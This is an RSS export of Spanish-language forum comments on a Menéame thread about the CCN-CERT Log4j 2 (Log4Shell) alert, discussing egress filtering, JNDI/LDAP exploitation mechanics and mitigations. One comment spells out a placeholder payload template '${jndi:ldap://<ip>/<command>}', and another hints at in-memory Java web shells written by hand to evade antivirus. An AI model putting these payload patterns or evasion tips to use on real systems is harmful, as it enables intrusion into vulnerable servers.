<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" 
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:wfw="http://wellformedweb.org/CommentAPI/"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:meneame="http://meneame.net/faq-es.php"
 >
<channel>
	<title>Menéame: comentarios [3595568]</title>
	<link>http://www.meneame.net</link>
	<image><title>www.meneame.net</title><link>http://www.meneame.net</link><url>http://cdn.mnmstatic.net/m/Tecnología/img/mnm/eli-rss.png</url></image>
	<description>Sitio colaborativo de publicación y comunicación entre blogs</description>
	<pubDate>Tue, 14 Dec 2021 21:52:16 +0000</pubDate>
	<generator>http://blog.meneame.net/</generator>
	<language>es</language>
	<item>
		<meneame:comment_id>34544742</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>55</meneame:order>
		<meneame:user>el-brujo</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#55 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c055#c-55</link>
		<pubDate>Tue, 14 Dec 2021 21:52:16 +0000</pubDate>
		<dc:creator>el-brujo</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c055#c-55</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-54" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c054#c-54" rel="nofollow">#54</a> CloudFlare  ya detectó ataques de la vulnerabilidad 9 días antes de hacerse pública.....<br />
Fuente:<br />
<a href="https://twitter.com/eastdakota/status/1469800951351427073" title="twitter.com/eastdakota/status/1469800951351427073" rel="nofollow">twitter.com/eastdakota/status/1469800951351427073</a></p><p>&#187;&nbsp;autor: <strong>el-brujo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34544089</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>54</meneame:order>
		<meneame:user>maloconocido</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#54 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c054#c-54</link>
		<pubDate>Tue, 14 Dec 2021 19:48:18 +0000</pubDate>
		<dc:creator>maloconocido</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c054#c-54</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-1" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c01#c-1" rel="nofollow">#1</a> y los que ya habrían caído sin saberlo años antes...</p><p>&#187;&nbsp;autor: <strong>maloconocido</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34542608</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>53</meneame:order>
		<meneame:user>xkill</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#53 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c053#c-53</link>
		<pubDate>Tue, 14 Dec 2021 15:30:00 +0000</pubDate>
		<dc:creator>xkill</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c053#c-53</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-35" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c035#c-35" rel="nofollow">#35</a> si tienes toda la razón, pero de ahí a aconsejar que antes que filtrar en la entrada lo hagan en la salida.... Porque vamos que poner una web Shell es facilísimo y no hace falta que el servidor tenga conexión. Es más, al cargar en memoria la clase de Java puedes cargar en memoria la webshell y eso ya es más jodido de pillar.<br />
Los C2 que hagan conexiones inversas muy bien, pero como no soluciones el problema poco vas a hacer<br />
<br />
Edit: mira qué fácil: <a href="https://duckduckgo.com/?q=java+class+web+shell+github" title="duckduckgo.com/?q=java+class+web+shell+github" rel="nofollow">duckduckgo.com/?q=java+class+web+shell+github</a><br />
Y nada te lo curras un poco más (o menos) y haces una webshell a mano para saltarte las firmas del AV</p><p>&#187;&nbsp;autor: <strong>xkill</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34542391</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>52</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#52 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c052#c-52</link>
		<pubDate>Tue, 14 Dec 2021 15:03:39 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c052#c-52</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-51" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c051#c-51" rel="nofollow">#51</a> Quiza cuando haya pasado un tiempo prepare un articulo explicando todos los detalles de esta vulnerabilidad</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34541162</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>51</meneame:order>
		<meneame:user>nodanero</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#51 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c051#c-51</link>
		<pubDate>Tue, 14 Dec 2021 12:32:23 +0000</pubDate>
		<dc:creator>nodanero</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c051#c-51</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-48" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c048#c-48" rel="nofollow">#48</a> Gracias por la explicación. Ya veo que en este caso se esta utilizando LDAP y para eso se necesita un servidor en remoto. Veo que hay otros como HTTP, RMI, DNS y BeanFactory, me intriga saber hasta que punto se podria explotar JNDI XBean pero no soy desarrollador y es mas bien curiosidad, asi que me esperare a ver como se va la cosa.</p><p>&#187;&nbsp;autor: <strong>nodanero</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540836</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>50</meneame:order>
		<meneame:user>--37472--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>12</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#50 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c050#c-50</link>
		<pubDate>Tue, 14 Dec 2021 11:57:56 +0000</pubDate>
		<dc:creator>--37472--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c050#c-50</guid>
		<description><![CDATA[<p>[Usuario deshabilitado]</p><p>&#187;&nbsp;autor: <strong>--37472--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540697</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>49</meneame:order>
		<meneame:user>warheart</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>13</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#49 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c049#c-49</link>
		<pubDate>Tue, 14 Dec 2021 11:43:24 +0000</pubDate>
		<dc:creator>warheart</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c049#c-49</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-47" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c047#c-47" rel="nofollow">#47</a> como si no hubiera más opciones. Conozco unos cuantos casos con slf4j + logback que están bastante tranquilos.</p><p>&#187;&nbsp;autor: <strong>warheart</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540638</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>48</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#48 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c048#c-48</link>
		<pubDate>Tue, 14 Dec 2021 11:36:14 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c048#c-48</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-45" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c045#c-45" rel="nofollow">#45</a> para añadir más detalle, aunque es muy cómodo montar un servidor ldap que genere comandos dinámicos, tiene el inconveniente (o más bien ventaja para el pobre que está intentando paliar el problema)de dejar un rastro claro en el log de los comandos que se ejecutaron</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540633</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>47</meneame:order>
		<meneame:user>wai</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>8</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#47 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c047#c-47</link>
		<pubDate>Tue, 14 Dec 2021 11:35:37 +0000</pubDate>
		<dc:creator>wai</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c047#c-47</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-16" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c016#c-16" rel="nofollow">#16</a> Si usa java y no usa log4j su problema es mucho mayor que este problemilla de seguridad.</p><p>&#187;&nbsp;autor: <strong>wai</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540564</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>46</meneame:order>
		<meneame:user>Drazul</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#46 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c046#c-46</link>
		<pubDate>Tue, 14 Dec 2021 11:27:15 +0000</pubDate>
		<dc:creator>Drazul</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c046#c-46</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-36" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c036#c-36" rel="nofollow">#36</a> lo que se pide bloquear no es &#34;devolver&#34; la conexión. Lo que se pide es no poder iniciar una conexión desde el servidor hacia Internet.</p><p>&#187;&nbsp;autor: <strong>Drazul</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540559</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>45</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#45 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c045#c-45</link>
		<pubDate>Tue, 14 Dec 2021 11:26:43 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c045#c-45</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-42" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c042#c-42" rel="nofollow">#42</a> vale, acabo de leer hasta el final y creo que he encontrado lo que puede haberte llevado a confusión. Muestran logs donde se ve algo parecido a ${jndi:ldap://&#60;ip&#62;/&#60;comando_en_base64&#62;}.<br />
<br />
Lo que ocurre en este caso no es que el servidor ejecute directamente el comando en base 64 que está ahí, sino que alguien ha creado un servidor ldap en &#60;ip&#62; que cuando le preguntas por &#60;comando_en_base64&#62; El servidor ldap responde con un exploit generado dinámicamente para ejecutar ese comando. Pero la máquina atacada sigue teniendo que conectar a ldap://&#60;ip&#62;/&#60;comando_en_base64&#62; y descargar el exploit.</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540516</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>44</meneame:order>
		<meneame:user>lolerman</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#44 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c044#c-44</link>
		<pubDate>Tue, 14 Dec 2021 11:21:53 +0000</pubDate>
		<dc:creator>lolerman</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c044#c-44</guid>
		<description><![CDATA[<p>Es que Java no va a morir nunca... seguirá dando por saco eternamente.</p><p>&#187;&nbsp;autor: <strong>lolerman</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540473</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>43</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#43 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c043#c-43</link>
		<pubDate>Tue, 14 Dec 2021 11:16:30 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c043#c-43</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-42" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c042#c-42" rel="nofollow">#42</a> sacado de tu enlace:<br />
<br />
By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload.</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540441</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>42</meneame:order>
		<meneame:user>nodanero</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#42 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c042#c-42</link>
		<pubDate>Tue, 14 Dec 2021 11:12:32 +0000</pubDate>
		<dc:creator>nodanero</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c042#c-42</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-40" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c040#c-40" rel="nofollow">#40</a> Claro. <a href="https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/" title="unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/" rel="nofollow">unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/</a><br />
<br />
Aqui muestran en el ejemplo, alguna peticion del escaneo masivo. Estas peticiones llevan un User-Agent modificado en el que esta embebido un comando (curl,wget,bash).<br />
Lo que yo entiendo es que esa peticion podria llevar cualquier otro User-Agent con el comando que el atacante quisiera, como el del ejemplo que puse al principio. Se podria pasar una payload a base de peticiones HTTP sin tener que conectarse a un servidor remoto para descargar (a diferencia del ejemplo de Palo Alto).</p><p>&#187;&nbsp;autor: <strong>nodanero</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540416</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>41</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>16</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#41 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c041#c-41</link>
		<pubDate>Tue, 14 Dec 2021 11:09:47 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c041#c-41</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-32" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c032#c-32" rel="nofollow">#32</a> puedo confirmar que esta mitigación, aunque pueda sonar un poco salvaje, es válida. Eso si, requiere reiniciar el servicio</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540388</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>40</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#40 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c040#c-40</link>
		<pubDate>Tue, 14 Dec 2021 11:06:21 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c040#c-40</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-37" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c037#c-37" rel="nofollow">#37</a> creo que puedo decir sin miedo a equivocarme que conozco esta vulnerabilidad extremadamente bien, y no funciona como dices. Si tienes el enlace, puedo echar un vistazo, ver exactamente qué comentan, pero estoy convencido que hablan de la vulnerabilidad de ejecución remota que todos conocemos</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540366</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>39</meneame:order>
		<meneame:user>--587023--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#39 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c039#c-39</link>
		<pubDate>Tue, 14 Dec 2021 11:04:10 +0000</pubDate>
		<dc:creator>--587023--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c039#c-39</guid>
		<description><![CDATA[<p>[Usuario deshabilitado]</p><p>&#187;&nbsp;autor: <strong>--587023--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540330</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>38</meneame:order>
		<meneame:user>hynreck</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#38 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c038#c-38</link>
		<pubDate>Tue, 14 Dec 2021 10:59:48 +0000</pubDate>
		<dc:creator>hynreck</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c038#c-38</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-36" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c036#c-36" rel="nofollow">#36</a> Tu te conectas a un servidor web y le dices &#34;GET&#34; o &#34;PUT&#34; el servidor web no se conecta a tu equipo, la pagina &#34;te la traes&#34; tu (tu navegador)</p><p>&#187;&nbsp;autor: <strong>hynreck</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540315</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>37</meneame:order>
		<meneame:user>nodanero</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#37 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c037#c-37</link>
		<pubDate>Tue, 14 Dec 2021 10:58:23 +0000</pubDate>
		<dc:creator>nodanero</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c037#c-37</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-34" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c034#c-34" rel="nofollow">#34</a> No. Puedes ver el ejemplo en la web de Palo Alto, donde muestran la peticion al servidor, y el comando incluido en ella. En ese ejemplo enseñan concatenado &#34;curl&#34;, &#34;wget&#34;, &#34;bash&#34; pero podria haber sido cualquier otro.</p><p>&#187;&nbsp;autor: <strong>nodanero</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540313</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>36</meneame:order>
		<meneame:user>paragomba</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#36 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c036#c-36</link>
		<pubDate>Tue, 14 Dec 2021 10:58:14 +0000</pubDate>
		<dc:creator>paragomba</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c036#c-36</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-6" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c06#c-6" rel="nofollow">#6</a> ¿como que un servidor web no necesita devolver la conexion?¿Como hace entonces para que la pagina llegue a tu navegador?<br />
Se pueden cerrar los servicios y puertos no necesarios, poner un firewall que filtre el trafico entrante, un firewall a nivel de aplicacion que corte la conexion si la web intenta hacer cosas raras ... pero dejar un servidor web sin salida a internet no tiene sentido.</p><p>&#187;&nbsp;autor: <strong>paragomba</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540299</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>35</meneame:order>
		<meneame:user>--652706--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>17</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#35 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c035#c-35</link>
		<pubDate>Tue, 14 Dec 2021 10:57:18 +0000</pubDate>
		<dc:creator>--652706--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c035#c-35</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-11" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c011#c-11" rel="nofollow">#11</a> Esto... si tengo un ecommerce tengo q tener la entrada HTTP/HTTPS abierta a cualquiera que quiera comprarme (aunque siempre se puede limitar por país de origen o por reputación de IP para controlar un poco). <br />
<br />
Pero mi servidor web no tiene porqué tener salida a Internet por si mismo, más que a aquello que necesite.<br />
<a class="tooltip c:3595568-3" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c03#c-3" rel="nofollow">#3</a> Veo que <a class="tooltip c:3595568-6" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c06#c-6" rel="nofollow">#6</a> lo ha explicado mejor que yo <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/roll.gif" alt=":roll:" title=":roll:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> <br />
<br />
<a class="tooltip c:3595568-24" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c024#c-24" rel="nofollow">#24</a> Obviamente no hay solución mágica (o dejaríamos de cobrar a final de mes <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/shit.png" alt=":shit:" title=":shit:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> ) pero como 'la moda' es usar sistemas modulares donde una vez tomas control del servidor te descargas los módulos que necesites... con un buen control de tráfico saliente limitarías muchos ataques.<br />
<br />
